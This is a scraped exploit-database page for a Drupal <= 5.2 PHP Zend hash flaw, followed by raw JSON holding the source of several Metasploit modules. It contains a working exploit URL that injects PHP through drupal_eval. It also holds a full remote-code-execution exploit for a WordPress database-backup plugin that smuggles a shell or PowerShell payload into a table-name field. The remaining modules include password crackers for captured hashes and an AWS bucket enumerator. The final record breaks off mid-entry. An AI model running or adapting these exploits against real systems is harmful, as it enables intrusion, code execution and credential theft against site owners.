Search...

Drupal <= 5.2 PHP Zend Hash Vulnerability Exploitation Vector

2007-10-10T00:00:00

ID 1337DAY-ID-2213
Type zdt
Reporter ShAnKaR
Modified 2007-10-10T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =============================================================
Drupal &lt;= 5.2 PHP Zend Hash Vulnerability Exploitation Vector
=============================================================



Drupal &lt;= 5.2 PHP Zend Hash Vulnerability Exploitation Vector

Example: http://www.example.com/drupal/?_menu[callbacks][1][callback]=drupal_eval&_menu[items][][type]=-1&-312030023=1&q=1/&lt;?phpinfo();



#  0day.today [2018-03-02]  #

JSON Vulners Source

Initial Source

{"published": "2007-10-10T00:00:00", "id": "1337DAY-ID-2213", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T01:02:31", "bulletin": {"published": "2007-10-10T00:00:00", "id": "1337DAY-ID-2213", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 6.4, "modified": "2016-04-20T01:02:31"}}, "hash": "fa94adbdfb4307aca3b3878ade7fc875a234d7fcb0ce1d30e33deda1835f9340", "description": "Exploit for unknown platform in category web applications", "type": "zdt", "lastseen": "2016-04-20T01:02:31", "edition": 1, "title": "Drupal <= 5.2 PHP Zend Hash Vulnerability Exploitation Vector", "href": "http://0day.today/exploit/description/2213", "modified": "2007-10-10T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/2213", "references": [], "reporter": "ShAnKaR", "sourceData": "=============================================================\r\nDrupal <= 5.2 PHP Zend Hash Vulnerability Exploitation Vector\r\n=============================================================\r\n\r\n\r\n\r\nDrupal <= 5.2 PHP Zend Hash Vulnerability Exploitation Vector\r\n\r\nExample: http://www.example.com/drupal/?_menu[callbacks][1][callback]=drupal_eval&_menu[items][][type]=-1&-312030023=1&q=1/<?phpinfo();\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "fc982dfb126e26994793db5b7fef1f18", "key": "sourceData"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "a43939200d279809aef6a6dedf6699a9", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "1548195e88b21c6135a4e418f4e54c79", "key": "modified"}, {"hash": "d21e6f64a339b954887a62ddc0e55571", "key": "reporter"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "2a9b9a19feaa00606edb8149ae42e6f3", "key": "title"}, {"hash": "1548195e88b21c6135a4e418f4e54c79", "key": "published"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "00812ac56765e844fd2aaf3d888f1970", "key": "sourceHref"}], "objectVersion": "1.0"}}], "description": "Exploit for unknown platform in category web applications", "hash": "0d8fd1fdb437a5e5d419a2f55bcca5b93d70d2218d1d032c26b11a1185db1dd4", "enchantments": {"score": {"value": -0.1, "vector": "NONE", "modified": "2018-03-03T01:41:53"}, "dependencies": {"references": [{"type": "seebug", "idList": ["SSV:92748"]}, {"type": "zdt", "idList": ["1337DAY-ID-26008", "1337DAY-ID-25907", "1337DAY-ID-25896", "1337DAY-ID-25861", "1337DAY-ID-6843"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14657", "SECURITYVULNS:VULN:14658", "SECURITYVULNS:VULN:13764", "SECURITYVULNS:DOC:27160", "SECURITYVULNS:DOC:16228", "SECURITYVULNS:DOC:9241", "SECURITYVULNS:VULN:2213", "SECURITYVULNS:VULN:1591", "SECURITYVULNS:DOC:801"]}], "modified": "2018-03-03T01:41:53"}, "vulnersScore": -0.1}, "type": "zdt", "lastseen": "2018-03-03T01:41:53", "edition": 2, "title": "Drupal <= 5.2 PHP Zend Hash Vulnerability Exploitation Vector", "href": "https://0day.today/exploit/description/2213", "modified": "2007-10-10T00:00:00", "bulletinFamily": "exploit", "viewCount": 6, "cvelist": [], "sourceHref": "https://0day.today/exploit/2213", "references": [], "reporter": "ShAnKaR", "sourceData": "=============================================================\r\nDrupal <= 5.2 PHP Zend Hash Vulnerability Exploitation Vector\r\n=============================================================\r\n\r\n\r\n\r\nDrupal <= 5.2 PHP Zend Hash Vulnerability Exploitation Vector\r\n\r\nExample: http://www.example.com/drupal/?_menu[callbacks][1][callback]=drupal_eval&_menu[items][][type]=-1&-312030023=1&q=1/<?phpinfo();\r\n\r\n\r\n\n# 0day.today [2018-03-02] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "a76788d69fc2e9fa8117a5af73b3db4d", "key": "href"}, {"hash": "1548195e88b21c6135a4e418f4e54c79", "key": "modified"}, {"hash": "1548195e88b21c6135a4e418f4e54c79", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "d21e6f64a339b954887a62ddc0e55571", "key": "reporter"}, {"hash": "1e264ae79f3e8b348c22cfbf4704e34a", "key": "sourceData"}, {"hash": "2c6210d7d642f9042cfa7c38d9e5f7ee", "key": "sourceHref"}, {"hash": "2a9b9a19feaa00606edb8149ae42e6f3", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}

{"metasploit": [{"lastseen": "2019-12-17T16:21:50", "bulletinFamily": "exploit", "description": "This module uses Hashcat to identify weak passwords that have been acquired from Android systems. These utilize MD5 or SHA1 hashing. Android (Samsung) SHA1 is format 5800 in Hashcat. Android (non-Samsung) SHA1 is format 110 in Hashcat. Android MD5 is format 10. JTR does not support Android hashes at the time of writing.\n", "modified": "2019-11-17T18:44:19", "published": "2019-11-09T20:55:53", "id": "MSF:AUXILIARY/ANALYZE/CRACK_MOBILE", "href": "", "type": "metasploit", "title": "Password Cracker: Mobile", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/password_cracker'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::PasswordCracker\n\n def initialize\n super(\n 'Name' => 'Password Cracker: Mobile',\n 'Description' => %Q{\n This module uses Hashcat to identify weak passwords that have been\n acquired from Android systems. These utilize MD5 or SHA1 hashing.\n Android (Samsung) SHA1 is format 5800 in Hashcat. Android\n (non-Samsung) SHA1 is format 110 in Hashcat. Android MD5 is format 10.\n JTR does not support Android hashes at the time of writing.\n },\n 'Author' =>\n [\n 'h00die'\n ] ,\n 'License' => MSF_LICENSE, # JtR itself is GPLv2, but this wrapper is MSF (BSD)\n 'Actions' =>\n [\n ['hashcat', {'Description' => 'Use Hashcat'}],\n ],\n 'DefaultAction' => 'hashcat',\n )\n\n register_options(\n [\n OptBool.new('SAMSUNG',[false, 'Include Samsung SHA1 hashes', true]),\n OptBool.new('SHA1',[false, 'Include Android-SHA1 hashes', true]),\n OptBool.new('MD5',[false, 'Include Android-MD5 hashes', true]),\n OptBool.new('INCREMENTAL',[false, 'Run in incremental mode', true]),\n OptBool.new('WORDLIST',[false, 'Run in wordlist mode', true])\n ]\n )\n end\n\n def show_command(cracker_instance)\n return unless datastore['ShowCommand']\n if action.name == 'john' # leaving this code here figuring jtr will eventually come around, but its an unused code block\n cmd = cracker_instance.john_crack_command\n elsif action.name == 'hashcat'\n cmd = cracker_instance.hashcat_crack_command\n end\n print_status(\" Cracking Command: #{cmd.join(' ')}\")\n end\n\n def print_results(tbl, cracked_hashes)\n cracked_hashes.each do |row|\n unless tbl.rows.include? row\n tbl << row\n end\n end\n tbl.to_s\n end\n\n def run\n def process_crack(results, hashes, cred, hash_type, method)\n return results if cred['core_id'].nil? # make sure we have good data\n # make sure we dont add the same one again\n if results.select {|r| r.first == cred['core_id']}.empty?\n results << [cred['core_id'], hash_type, cred['username'], cred['password'], method]\n end\n\n create_cracked_credential( username: cred['username'], password: cred['password'], core_id: cred['core_id'])\n results\n end\n\n def check_results(passwords, results, hash_type, hashes, method)\n passwords.each do |password_line|\n password_line.chomp!\n next if password_line.blank?\n fields = password_line.split(\":\")\n # If we don't have an expected minimum number of fields, this is probably not a hash line\n if action.name == 'john'\n next unless fields.count >=3\n cred = {}\n cred['username'] = fields.shift\n cred['core_id'] = fields.pop\n 4.times { fields.pop } # Get rid of extra :\n cred['password'] = fields.join(':') # Anything left must be the password. This accounts for passwords with semi-colons in it\n results = process_crack(results, hashes, cred, hash_type, method)\n elsif action.name == 'hashcat'\n next unless fields.count >= 2\n hash = \"#{fields.shift}:#{fields.shift}\" #grab hash and salt\n password = fields.join(':') # Anything left must be the password. This accounts for passwords with : in them\n next if hash.include?(\"Hashfile '\") && hash.include?(\"' on line \") # skip error lines\n hashes.each do |h|\n next unless h['hash'].downcase == hash.downcase\n cred = {'core_id' => h['id'],\n 'username' => h['un'],\n 'password' => password}\n results = process_crack(results, hashes, cred, hash_type, method)\n end\n end\n end\n results\n end\n\n tbl = Rex::Text::Table.new(\n 'Header' => 'Cracked Hashes',\n 'Indent' => 1,\n 'Columns' => ['DB ID', 'Hash Type', 'Username', 'Cracked Password', 'Method']\n )\n\n # array of hashes in jtr_format in the db, converted to an OR combined regex\n hashes_regex = []\n hashes_regex << 'android-sha1' if datastore['SHA1']\n hashes_regex << 'android-samsung-sha1' if datastore['SAMSUNG']\n hashes_regex << 'android-md5' if datastore['MD5']\n # array of arrays for cracked passwords.\n # Inner array format: db_id, hash_type, username, password, method_of_crack\n results = []\n\n cracker = new_password_cracker\n cracker.cracker = action.name\n\n cracker_version = cracker.cracker_version\n if action.name == 'john' and not cracker_version.include?'jumbo'\n fail_with(Failure::BadConfig, 'John the Ripper JUMBO patch version required. See https://github.com/magnumripper/JohnTheRipper')\n end\n print_good(\"#{action.name} Version Detected: #{cracker_version}\")\n\n # create the hash file first, so if there aren't any hashes we can quit early\n # hashes is a reference list used by hashcat only\n cracker.hash_path, hashes = hash_file(hashes_regex)\n\n wordlist = wordlist_file\n unless wordlist\n print_error('This module cannot run without a database connected. Use db_connect to connect to a database.')\n return\n end\n\n wordlist.close\n print_status \"Wordlist file written out to #{wordlist.path}\"\n\n cleanup_files = [cracker.hash_path, wordlist.path]\n\n hashes_regex.each do |format|\n # dupe our original cracker so we can safely change options between each run\n cracker_instance = cracker.dup\n cracker_instance.format = format\n\n if action.name == 'john'\n cracker_instance.fork = datastore['FORK']\n end\n\n # first check if anything has already been cracked so we don't report it incorrectly\n print_status \"Checking #{format} hashes already cracked...\"\n results = check_results(cracker_instance.each_cracked_password, results, format, hashes, 'Already Cracked/POT')\n vprint_good(print_results(tbl, results))\n\n if action.name == 'john'\n print_status \"Cracking #{format} hashes in single mode...\"\n cracker_instance.mode_single(wordlist.path)\n show_command cracker_instance\n cracker_instance.crack do |line|\n vprint_status line.chomp\n end\n results = check_results(cracker_instance.each_cracked_password, results, format, hashes, 'Single')\n vprint_good(print_results(tbl, results))\n\n print_status \"Cracking #{format} hashes in normal mode\"\n cracker_instance.mode_normal\n show_command cracker_instance\n cracker_instance.crack do |line|\n vprint_status line.chomp\n end\n results = check_results(cracker_instance.each_cracked_password, results, format, hashes, 'Normal')\n vprint_good(print_results(tbl, results))\n end\n\n if action.name == 'hashcat'\n print_status \"Cracking #{format} hashes in pin mode...\"\n cracker_instance.mode_pin\n show_command cracker_instance\n cracker_instance.crack do |line|\n vprint_status line.chomp\n end\n results = check_results(cracker_instance.each_cracked_password, results, format, hashes, 'Pin')\n vprint_good(print_results(tbl, results))\n end\n\n if datastore['INCREMENTAL']\n print_status \"Cracking #{format} hashes in incremental mode...\"\n cracker_instance.mode_incremental\n show_command cracker_instance\n cracker_instance.crack do |line|\n vprint_status line.chomp\n end\n results = check_results(cracker_instance.each_cracked_password, results, format, hashes, 'Incremental')\n vprint_good(print_results(tbl, results))\n end\n\n if datastore['WORDLIST']\n print_status \"Cracking #{format} hashes in wordlist mode...\"\n cracker_instance.mode_wordlist(wordlist.path)\n # Turn on KoreLogic rules if the user asked for it\n if action.name == 'john' && datastore['KORELOGIC']\n cracker_instance.rules = 'KoreLogicRules'\n print_status \"Applying KoreLogic ruleset...\"\n end\n show_command cracker_instance\n cracker_instance.crack do |line|\n vprint_status line.chomp\n end\n\n results = check_results(cracker_instance.each_cracked_password, results, format, hashes, 'Wordlist')\n vprint_good(print_results(tbl, results))\n end\n\n #give a final print of results\n print_good(print_results(tbl, results))\n end\n\n if datastore['DeleteTempFiles']\n cleanup_files.each do |f|\n File.delete(f)\n end\n end\n end\n\n def hash_file(hashes_regex)\n hashes = []\n wrote_hash = false\n hashlist = Rex::Quickfile.new(\"hashes_tmp\")\n # descrypt is what JtR calls it, des is what we save it in the db as\n hashes_regex = hashes_regex.join('|')\n regex = Regexp.new hashes_regex\n framework.db.creds(workspace: myworkspace, type: 'Metasploit::Credential::NonreplayableHash').each do |core|\n next unless core.private.jtr_format =~ regex\n # only add hashes which haven't been cracked\n next unless already_cracked_pass(core.private.data).nil?\n if action.name == 'john'\n hashlist.puts hash_to_jtr(core)\n elsif action.name == 'hashcat'\n # hashcat hash files dont include the ID to reference back to so we build an array to reference\n hashes << {'hash' => core.private.data, 'un' => core.public.username, 'id' => core.id}\n hashlist.puts hash_to_hashcat(core)\n end\n wrote_hash = true\n end\n hashlist.close\n unless wrote_hash # check if we wrote anything and bail early if we didn't\n hashlist.delete\n fail_with Failure::NotFound, 'No applicable hashes in database to crack'\n end\n print_status \"Hashes Written out to #{hashlist.path}\"\n return hashlist.path, hashes\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/analyze/crack_mobile.rb"}, {"lastseen": "2020-01-22T14:53:53", "bulletinFamily": "exploit", "description": "This module imports a Juniper ScreenOS or JunOS device configuration.\n", "modified": "2019-09-30T19:03:38", "published": "2019-07-08T01:49:48", "id": "MSF:AUXILIARY/ADMIN/JUNIPER/JUNIPER_CONFIG", "href": "", "type": "metasploit", "title": "Juniper Configuration Importer", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/juniper'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::Juniper\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'Juniper Configuration Importer',\n 'Description' => %q{\n This module imports a Juniper ScreenOS or JunOS device configuration.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'h00die'],\n 'Actions' =>\n [\n ['JUNOS', {'Description' => 'Import JunOS Config File'}],\n ['SCREENOS', {'Description' => 'Import ScreenOS Config File'}],\n ],\n 'DefaultAction' => 'JUNOS',\n ))\n\n register_options(\n [\n OptPath.new('CONFIG', [true, 'Path to configuration to import']),\n Opt::RHOST(),\n Opt::RPORT(22)\n ])\n\n end\n\n def run\n unless ::File.exist?(datastore['CONFIG'])\n fail_with Failure::BadConfig, \"Juniper config file #{datastore['CONFIG']} does not exists!\"\n end\n juniper_config = ::File.open(datastore['CONFIG'], \"rb\")\n print_status('Importing config')\n if action.name == 'JUNOS'\n juniper_junos_config_eater(datastore['RHOSTS'],datastore['RPORT'],juniper_config.read)\n elsif action.name == 'SCREENOS'\n juniper_screenos_config_eater(datastore['RHOSTS'],datastore['RPORT'],juniper_config.read)\n end\n print_good('Config import successful')\n end\nend\n\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/juniper/juniper_config.rb"}, {"lastseen": "2020-01-06T05:50:34", "bulletinFamily": "exploit", "description": "Provided AWS credentials, this module will call the authenticated API of Amazon Web Services to list all S3 buckets associated with the account\n", "modified": "2019-06-25T21:35:44", "published": "2019-06-20T20:08:30", "id": "MSF:AUXILIARY/CLOUD/AWS/ENUM_S3", "href": "", "type": "metasploit", "title": "Amazon Web Services S3 instance enumeration", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'aws-sdk-s3'\n\nclass MetasploitModule < Msf::Auxiliary\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Amazon Web Services S3 instance enumeration',\n 'Description' => %q(\n Provided AWS credentials, this module will call the authenticated\n API of Amazon Web Services to list all S3 buckets associated\n with the account\n ),\n 'Author' => ['Aaron Soto <aaron.soto@rapid7.com>'],\n 'License' => MSF_LICENSE\n )\n )\n\n register_options(\n [\n OptString.new('REGION', [false, 'AWS Region (eg. \"us-west-2\")']),\n OptString.new('ACCESS_KEY_ID', [true, 'AWS Access Key ID (eg. \"AKIAXXXXXXXXXXXXXXXX\")', '']),\n OptString.new('SECRET_ACCESS_KEY', [true, 'AWS Secret Access Key (eg. \"CA1+XXXXXXXXXXXXXXXXXXXXXX6aYDHHCBuLuV79\")', ''])\n ]\n )\n end\n\n def handle_aws_errors(e)\n if e.class.parents.include?(Aws)\n fail_with(Failure::UnexpectedReply, e.message)\n else\n raise e\n end\n end\n\n def describe_s3_bucket(i)\n print_good \" Name: #{i.name}\"\n print_good \" Creation Date: #{i.creation_date}\"\n print_good \" # of Objects: #{@s3.list_objects_v2(bucket: i.name).contents.length}\"\n print_good \" Region: #{@s3.get_bucket_location(bucket: i.name).location_constraint}\"\n\n begin\n print_good \" Website: /#{@s3.get_bucket_website(bucket: i.name).index_document.suffix}\"\n rescue Aws::S3::Errors::NoSuchWebsiteConfiguration\n print_good \" Website: (None)\"\n end\n\n acl = @s3.get_bucket_acl(bucket: i.name)\n print_good \" Owner: #{acl.owner.display_name}\"\n print_good \" Permissions:\"\n acl.grants.each do |i|\n grantee = i.grantee.type == \"CanonicalUser\" ? \"User\" : i.grantee.type\n grantee << \" '#{i.grantee.display_name}'\"\n grantee << \" (#{i.grantee.email_address})\" unless i.grantee.email_address.nil?\n grantee << \" (#{i.grantee.uri})\" unless i.grantee.uri.nil?\n print_good \" #{grantee} granted #{i.permission}\"\n end\n print_status ''\n end\n\n def run\n region = datastore['REGION']\n\n @s3 = Aws::S3::Client.new(\n region: \"us-west-2\", # This doesn't actually filter anything, but\n # it's still required. Thanks AWS. :-(\n access_key_id: datastore['ACCESS_KEY_ID'],\n secret_access_key: datastore['SECRET_ACCESS_KEY']\n )\n\n buckets = @s3.list_buckets.buckets\n unless buckets.length > 0\n print_status 'No buckets found.'\n return\n end\n\n print_good \"Found #{buckets.count} buckets.\"\n if region.nil?\n buckets.each do |i|\n describe_s3_bucket(i)\n end\n else\n print_good \"Listing buckets that match REGION '#{datastore['REGION']}':\"\n buckets.each do |i|\n if @s3.get_bucket_location(bucket: i.name).location_constraint.starts_with? region\n describe_s3_bucket(i)\n end\n end\n end\n print_status 'Done.'\n rescue ::Exception => e\n handle_aws_errors(e)\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/cloud/aws/enum_s3.rb"}, {"lastseen": "2020-01-20T07:43:15", "bulletinFamily": "exploit", "description": "There exists a command injection vulnerability in the Wordpress plugin `wp-database-backup` for versions < 5.2. For the backup functionality, the plugin generates a `mysqldump` command to execute. The user can choose specific tables to exclude from the backup by setting the `wp_db_exclude_table` parameter in a POST request to the `wp-database-backup` page. The names of the excluded tables are included in the `mysqldump` command unsanitized. Arbitrary commands injected through the `wp_db_exclude_table` parameter are executed each time the functionality for creating a new database backup are run. Authentication is required to successfully exploit this vulnerability.\n", "modified": "2019-07-23T17:20:14", "published": "2019-06-20T19:05:41", "id": "MSF:EXPLOIT/MULTI/HTTP/WP_DB_BACKUP_RCE", "href": "", "type": "metasploit", "title": "WP Database Backup RCE", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::CmdStager\n include Msf::Exploit::Powershell\n include Msf::Exploit::Remote::HTTP::Wordpress\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'WP Database Backup RCE',\n 'Description' => %q(\n There exists a command injection vulnerability in the Wordpress plugin\n `wp-database-backup` for versions < 5.2.\n\n For the backup functionality, the plugin generates a `mysqldump` command\n to execute. The user can choose specific tables to exclude from the backup\n by setting the `wp_db_exclude_table` parameter in a POST request to the\n `wp-database-backup` page. The names of the excluded tables are included in\n the `mysqldump` command unsanitized. Arbitrary commands injected through the\n `wp_db_exclude_table` parameter are executed each time the functionality\n for creating a new database backup are run.\n\n Authentication is required to successfully exploit this vulnerability.\n ),\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Mikey Veenstra / Wordfence', # Vulnerability Discovery\n 'Shelby Pace' # Metasploit module\n ],\n 'References' =>\n [\n [ 'URL', 'https://www.wordfence.com/blog/2019/05/os-command-injection-vulnerability-patched-in-wp-database-backup-plugin/' ],\n ],\n 'Platform' => [ 'win', 'linux' ],\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'Targets' =>\n [\n [\n 'Windows',\n {\n 'Platform' => 'win',\n 'Arch' => [ ARCH_X86, ARCH_X64 ]\n }\n ],\n [\n 'Linux',\n {\n 'Platform' => 'linux',\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'CmdStagerFlavor' => 'printf'\n }\n ]\n ],\n 'DisclosureDate' => '2019-04-24',\n 'DefaultTarget' => 0\n ))\n\n register_options(\n [\n OptString.new('USERNAME', [ true, 'Wordpress username', '' ]),\n OptString.new('PASSWORD', [ true, 'Wordpress password', '' ]),\n OptString.new('TARGETURI', [ true, 'Base path to Wordpress installation', '/' ])\n ])\n end\n\n def check\n return CheckCode::Unknown unless wordpress_and_online?\n\n changelog_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-database-backup', 'readme.txt')\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => changelog_uri\n )\n\n if res && res.code == 200\n version = res.body.match(/=+\\s(\\d+\\.\\d+)\\.?\\d*\\s=/)\n return CheckCode::Detected unless version && version.length > 1\n\n vprint_status(\"Version of wp-database-backup detected: #{version[1]}\")\n return CheckCode::Appears if Gem::Version.new(version[1]) < Gem::Version.new('5.2')\n end\n CheckCode::Safe\n end\n\n def exploit\n cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])\n fail_with(Failure::NoAccess, 'Unable to log into Wordpress') unless cookie\n\n res = create_exclude_table(cookie)\n nonce = get_nonce(res)\n create_backup(cookie, nonce)\n\n clear_exclude_table(cookie)\n end\n\n def create_exclude_table(cookie)\n @exclude_uri = normalize_uri(target_uri.path, 'wp-admin', 'tools.php')\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => @exclude_uri,\n 'cookie' => cookie,\n 'vars_get' => { 'page' => 'wp-database-backup' }\n )\n\n fail_with(Failure::NotFound, 'Unable to reach the wp-database-backup settings page') unless res && res.code == 200\n print_good('Reached the wp-database-backup settings page')\n if datastore['TARGET'] == 1\n comm_payload = generate_cmdstager(concat_operator: ' && ', temp: './')\n comm_payload = comm_payload.join('&&')\n comm_payload = comm_payload.gsub('\\'', '')\n comm_payload = \"; #{comm_payload} ;\"\n else\n comm_payload = \" & #{cmd_psh_payload(payload.encoded, payload.arch, remove_comspec: true, encode_final_payload: true)} & ::\"\n end\n\n table_res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => @exclude_uri,\n 'cookie' => cookie,\n 'vars_post' =>\n {\n 'wpsetting' => 'Save',\n 'wp_db_exclude_table[wp_comment]' => comm_payload\n }\n )\n\n fail_with(Failure::UnexpectedReply, 'Failed to submit payload as an excluded table') unless table_res && table_res.code\n print_good('Successfully added payload as an excluded table')\n\n res.get_html_document\n end\n\n def get_nonce(response)\n fail_with(Failure::UnexpectedReply, 'Failed to get a proper response') unless response\n\n div_res = response.at('p[@class=\"submit\"]')\n fail_with(Failure::NotFound, 'Failed to find the element containing the nonce') unless div_res\n\n wpnonce = div_res.to_s.match(/_wpnonce=([0-9a-z]*)/)\n fail_with(Failure::NotFound, 'Failed to retrieve the wpnonce') unless wpnonce && wpnonce.length > 1\n\n wpnonce[1]\n end\n\n def create_backup(cookie, nonce)\n first_res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => @exclude_uri,\n 'cookie' => cookie,\n 'vars_get' =>\n {\n 'page' => 'wp-database-backup',\n '_wpnonce' => nonce,\n 'action' => 'createdbbackup'\n }\n )\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => @exclude_uri,\n 'cookie' => cookie,\n 'vars_get' =>\n {\n 'page' => 'wp-database-backup',\n 'notification' => 'create'\n }\n )\n\n fail_with(Failure::UnexpectedReply, 'Failed to create database backup') unless res && res.code == 200 && res.body.include?('Database Backup Created Successfully')\n print_good('Successfully created a backup of the database')\n end\n\n def clear_exclude_table(cookie)\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => @exclude_uri,\n 'cookie' => cookie,\n 'vars_post' =>\n {\n 'wpsetting' => 'Save',\n 'wp_db_exclude_table[wp_comment]' => 'wp_comment'\n }\n )\n\n fail_with(Failure::UnexpectedReply, 'Failed to delete the remove the payload from the excluded tables') unless res && res.code == 200\n print_good('Successfully deleted the payload from the excluded tables list')\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/wp_db_backup_rce.rb"}, {"lastseen": "2020-01-08T03:07:20", "bulletinFamily": "exploit", "description": "This module is able to extract a zip file sent through Modbus from a pcap. Tested with Schneider TM221CE16R\n", "modified": "2019-06-18T19:08:47", "published": "2019-06-18T19:08:47", "id": "MSF:AUXILIARY/ANALYZE/MODBUS_ZIP", "href": "", "type": "metasploit", "title": "Extract zip from Modbus communication", "sourceData": "##\n## This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(\n 'Name' => 'Extract zip from Modbus communication',\n 'Description' => %q{\n This module is able to extract a zip file sent through Modbus from a pcap.\n Tested with Schneider TM221CE16R\n },\n 'Author' => [\n 'Jos\u00e9 Diogo Monteiro <jdlopes[at]student.dei.uc.pt>',\n 'Luis Rosa <lmrosa[at]dei.uc.pt)>'\n ],\n 'License' => MSF_LICENSE\n )\n\n register_options [\n Opt::RPORT(502),\n OptEnum.new('MODE', [true, 'Extract zip from upload/download capture', 'UPLOAD',\n ['UPLOAD','DOWNLOAD']]),\n OptString.new('PCAPFILE', [ true, 'Pcap to read', '' ]),\n OptString.new('FILENAME', [ false, 'Zip file output name'])\n ]\n\n end\n\n FIRST_BYTE_UPLOAD = 12\n FIRST_BYTE_DOWNLOAD = 16\n\n def extract_zip(packet, zip_packet, first_byte, data, packet_number)\n # ZIP start signature\n h = packet.payload.scan(/\\x50\\x4B\\x03\\x04.*/)\n if h.size.nonzero?\n print_status \"Zip start on packet #{packet_number + 1}\"\n data = h[0]\n zip_packet += 1\n return zip_packet, data\n end\n\n # ZIP end signature (central directory record)\n h = packet.payload.scan(/.*\\x50\\x4B\\x05\\x06................../)\n if h.size.nonzero?\n print_status \"Zip end on packet #{packet_number + 1}\"\n data += h[0][first_byte..-1]\n zip_packet += 1\n return zip_packet, data\n end\n\n # ZIP data\n if zip_packet == 1\n unless packet.payload[first_byte..-1].nil?\n data += packet.payload[first_byte..-1]\n end\n end\n return zip_packet, data\n end\n\n def run\n packets = PacketFu::PcapFile.read_packets datastore['PCAPFILE']\n zip_packet = 0\n data = ''\n packets.each_with_index do |packet, i|\n if datastore['MODE'] == 'UPLOAD'\n if packet.respond_to?(:tcp_src) and packet.tcp_src == datastore['RPORT']\n zip_packet, data = extract_zip(packet, zip_packet, FIRST_BYTE_UPLOAD, data, i)\n end\n elsif datastore['MODE'] == 'DOWNLOAD'\n if packet.respond_to?(:tcp_dst) and packet.tcp_dst == datastore['RPORT']\n zip_packet, data = extract_zip(packet, zip_packet, FIRST_BYTE_DOWNLOAD, data, i)\n end\n end\n break if zip_packet == 2\n end\n\n filename = datastore['FILENAME'] || 'project.zip'\n unless data.empty?\n path = store_loot(filename, 'application/zip', datastore['RHOSTS'], data, filename, 'modbus.zip')\n print_good \"Zip file saved in loot: #{path}\"\n else\n print_status \"Zip file not found in #{datastore['PCAPFILE']}\"\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/analyze/modbus_zip.rb"}, {"lastseen": "2020-01-22T16:40:45", "bulletinFamily": "exploit", "description": "This module uses John the Ripper or Hashcat to identify weak passwords that have been acquired from the mssql_hashdump, mysql_hashdump, postgres_hashdump, or oracle_hashdump modules. Passwords that have been successfully cracked are then saved as proper credentials. Due to the complexity of some of the hash types, they can be very slow. Setting the ITERATION_TIMEOUT is highly recommended.\n", "modified": "2019-10-09T00:31:23", "published": "2019-04-05T00:50:52", "id": "MSF:AUXILIARY/ANALYZE/CRACK_DATABASES", "href": "", "type": "metasploit", "title": "Password Cracker: Databases", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": 